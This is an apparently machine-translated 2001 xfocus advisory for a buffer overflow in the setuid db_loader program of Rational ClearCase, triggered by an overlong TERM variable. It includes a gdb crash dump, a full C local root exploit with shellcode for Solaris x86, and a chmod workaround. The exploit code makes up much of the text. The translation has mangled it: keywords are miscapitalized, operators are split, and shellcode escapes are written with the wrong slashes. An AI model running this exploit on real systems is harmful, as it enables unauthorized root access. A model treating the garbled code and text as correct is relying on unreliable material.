ClearCase db_loader environment variable Overflow Vulnerability
Creation Time: 2001-11-10
Article Properties: Original
Article Source: http://xfocus.org
Article submitted by: Inburst (inburst_at_263.net)
----------------------------------
ClearCase db_loader environment variable Overflow vulnerability
----------------------------------
Post information
--------
Discovery Date: August 2001
Release date: November 1, 2001
Discovered by: virtualcat@xfocus.org
Website: http://xfocus.org
Simple description
--------
Rational's software Configuration management tool ClearCase is primarily used in the Windows and UNIX development environment. ClearCase provides comprehensive configuration management capabilities-including versioning, workspace management, building management, and process Control-without the need for software developers to change their existing environment, tools, and working methods.
The administrative tool has a Db_loader program that has a default installation set Suid bit, but when you use an ultra-long environment variable "term", it can cause a buffer overflow, which could lead to system vires behavior.
Affected Software versions and platforms
----------------------
Impact version: ClearCase 3.2+, 4.0, 4.1, 4.2
Impact Systems: Linux, Solaris SPARC, Solaris x86, AIX, HP, Digital, IRIX, SCO etc.
Details
----
$ Term= ' perl-e ' print "A" x550 "
$ Export term
$/usr/atria/etc/db_loader
Bus Error
$ gdb Db_loader core-q
(No debugging symbols found) ... Core is generated by './db_loader '.
Cannot access memory at address 0xffffffffff3e1b80
#0 0xf0db8 in Imsg_fputs ()
(GDB) bt
#0 0xf0db8 in Imsg_fputs ()
Cannot access memory at address 0x41414179
(GDB) I reg
G0 0x0 0
G1 0x7b000 503808
G2 0x13cf84 1298308
G3 0x0 0
G4 0xf6c2c 1010732
G5 0x0 0
G6 0x0 0
G7 0x143d58 1326424
O0 0xffffffff-1
O1 0x1 1
O2 0xffbef054-4263852
O3 0xf0c3c 986172
O4 0xffbeed8a-4264566
O5 0xffffffff-1
SP 0xffbeef70-4264080
O7 0xf0db0 986544
L0 0x41414141 1094795585
L1 0x41414141 1094795585
L2 0x41414141 1094795585
L3 0x41414141 1094795585
L4 0x41414141 1094795585
L5 0x41414141 1094795585
L6 0x41414141 1094795585
L7 0x41414141 1094795585
I0 0x41414141 1094795585
I1 0x41414141 1094795585
I2 0x41414141 1094795585
i3 0x41414141 1094795585
I4 0x41414141 1094795585
i5 0x41414141 1094795585
FP 0x41414141 1094795585
i7 0x41414141 1094795585
Y 0x0 0
PSR 0xfe801007-25161721 icc:n---, pil:0, s:0, ps:0, et:0, Cwp:7
Wim 0x0 0
TBR 0x0 0
PC 0XF0DB8 986552
NPC 0xf0dbc 986556
FPSR 0x0 0th:n, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
CPSR 0x0 0
(GDB)
Local users can pass this vulnerability to unauthorized access to super-user privileges.
Test program
--------
Clearcase_x86exp.c
/* Rational ClearCase term environment variable buffer overflow exploit
* Test it again Solaris x86 7, bug found by virtualcat@xfocus.org
* Xploit by xundi@xfocus.org
* website:http://xfocus.org
*/
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#define RET_DIS 550
#define NOP 0x90
#define NNOP 512
#define ENV_VAR "term"
#define User_upper_magic 0X08047FFF
/* Shell code taken from Pablo Sor ' s "mailx-f" exploit code */
Char shellcode[] =
"/xeb/x48/x9a/xff/xff/xff/xff/x07/xff/xc3/x5e/x31/xc0/x89/x46/xb4"
"/X88/X46/XB9/X88/X46/X07/X89/X46/X0C/X31/XC0/X50/XB0/X8D/XE8/XDF"
"/xff/xff/xff/x83/xc4/x04/x31/xc0/x50/xb0/x17/xe8/xd2/xff/xff/xff"
"/x83/xc4/x04/x31/xc0/x50/x8d/x5e/x08/x53/x8d/x1e/x89/x5e/x08/x53"
"/XB0/X3B/XE8/XBB/XFF/XFF/XFF/X83/XC4/X0C/XE8/XBB/XFF/XFF/XFF/X2F"
"/x62/x69/x6e/x2f/x73/x68/xff/xff/xff/xff/xff/xff/xff/xff/xff";
int Get_esp ()
{
__asm__ ("mov%esp,%eax");
}
int getenvaddr (const char* envptr)
{
int envaddr = NULL;
int retCode = 0;
char* charptr = (char *) GET_ESP ();
/* Search for the starting address of the environment string for */
/* The specified environment variable */
while ((unsigned int) Charptr < (unsigned int) user_upper_magic)
{
RetCode = memcmp ((unsigned char *) charptr++, envptr, 4);
/* Found */
if (RetCode = = 0)
{
ENVADDR = (int) (CHARPTR-1);
Break
}
}
return envaddr;
}
int main (int argc, char** argv)
{
Char buff[256] = {0};
int* intPtr = NULL;
char* buffptr = NULL;
char* charptr = NULL;
int retaddr = 0;
int retvalue = 0;
int bufflen = 0;
int adjustment = 0;
int strLen = 0;
int alignment = 0;
int diff = 0;
int i;
int shellcodelen = strlen (ShellCode);
if (argc = = 2)
{
Adjustment = Atoi (argv[1]);
}
Bufflen = strlen (Env_var) + Ret_dis + Nnop + shellcodelen + 1;
Charptr = getenv (Env_var);
/* Adjust the stupid alignment */
StrLen = StrLen (charptr) + 1;
Alignment = StrLen% 4;
if (Alignment! = 0)
{
Alignment = 4-alignment;
StrLen + = alignment;
}
Alignment = Bufflen% 4;
if (Alignment! = 0)
{
Alignment = 4-alignment;
Bufflen + = alignment;
}
RetValue = Getenvaddr (Env_var);
diff = Bufflen-strlen;
RetAddr = Retvalue-diff + strlen (env_var) + 1;
Alignment = retaddr% 4;
if (Alignment! = 0)
{
Alignment = 4-alignment;
}
RetAddr + = Ret_dis + alignment + adjustment;
/* Allocate memory for the evil buffer */
Buffptr = (char *) malloc (Bufflen);
if (buffptr! = NULL)
{
strcpy (Buffptr, Env_var);
strcat (buffptr, "=");
Charptr = (char *) (buffptr + strlen (buffptr));
/* Fill the rest of the buffer with ' A ' */
memset (Charptr, 0x41, Bufflen-strlen (BUFFPTR)-4);
/* Butt in the return address */
INTPTR = (int *) (charptr + Ret_dis);
*intptr++ = RetAddr;
/* Make sure the Nops is located word aligned */
Charptr = (char *) intPtr;
Charptr + = alignment;
for (i=0; i<nnop; i++)
{
*charptr++ = NOP;
}
for (i=0; i<shellcodelen; i++)
{
*charptr++ = Shellcode[i];
}
*charptr = 0;
Putenv (BUFFPTR);
printf ("Jumping to 0x%.8x/n", retaddr);
Execl ("/usr/atria/etc/db_loader", "Xfocus", NULL);
}
Else
{
printf ("No more free memory!");
}
}
/*.. Thanks-Xfocus Members: Especially virtualcat*/
Temporary Solutions
------------
# chmod A-s/usr/atria/etc/db_loader
Manufacturer Information
--------
August 2001 has notified the manufacturer
Manufacturer Homepage: http://www.rational.com
About Xfocus
----------
Xfocus is a non-profit network and system security organization established in China in 1998 to identify and conduct research on the vulnerabilities of network, communications and software hardware.
Copyright 2001 Http://xfocus.org, welcome reprint, but must retain the copyright information.